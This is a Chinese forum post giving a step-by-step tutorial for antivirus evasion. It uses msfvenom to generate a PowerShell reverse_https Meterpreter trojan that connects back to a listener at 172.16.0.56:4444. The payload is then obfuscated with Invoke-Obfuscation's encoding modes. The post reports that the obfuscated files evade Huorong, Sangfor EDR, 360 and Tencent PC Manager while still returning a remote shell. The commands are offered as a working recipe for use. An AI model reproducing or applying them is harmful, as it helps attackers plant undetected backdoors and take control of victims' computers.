本帖最后由 小黑鱼快点游 于 2021-8-17 17:08 编辑
1.首先通过msfvenom生成一个ps1木马文件: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=172.16.0.56 LPORT=4444 -f psh-reflection > msf-crow1.ps1 然后通过msfconsole中的监听模块,搭配payload windows/x64/meterpreter/reverse_https模块先获取用户端的shell
2.进行病毒混淆免杀部分,首先再GitHub中下载文件包,
3.将其解压到目录中。 C:\0_poweshell\Invoke-Obfuscation-master\
4.这里开始执行poershell,注意一定要以管理员运行要不会有报错:
5.先执行:Set-ExecutionPolicy RemoteSigned
6.然后导入项目: Import-Module C:\0_powershell\Invoke-Obfuscation-master\Invoke-Obfuscation.psd1 Invoke-Obfuscation
7.这里选择ENCODING 编码的方式进行混淆:
8.加载之前需要混淆的木马文件,就是刚刚msfvenom生成的文件。 set scriptpath C:\0_powershell\ps\msf-crow1.ps1
9.这里我们直接选择第8中方式,进行混淆。他会自动混淆.
10.输出文件: out 88.ps1 会有一个弹框文件,展现加密的文件内容,看完直接关掉即可。
11.然后重复第一步,监听动作,依然可以直接拿权。
12按照上面的方式,我们将1-8种的每个混淆方式全部做一下,
其中第5个和第7个数据大,反弹比较慢,可以看到下面均反弹获取到了session。
13.这里我们一共生成了9个文件,
先用火绒全部跑一下:
然后用深信服edr跑一下:
然后我们用360跑一下:
最后我们用腾讯管家跑一下: 总结:可以看到,edr能够对原始生成的文件进行查杀,但是经过混淆之后的都没有查杀。其中火绒在对22ps1,33ps1,7ps1文件没有查杀。 | 
楼主
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
发表于 2021-10-20 08:37
技术员3级 
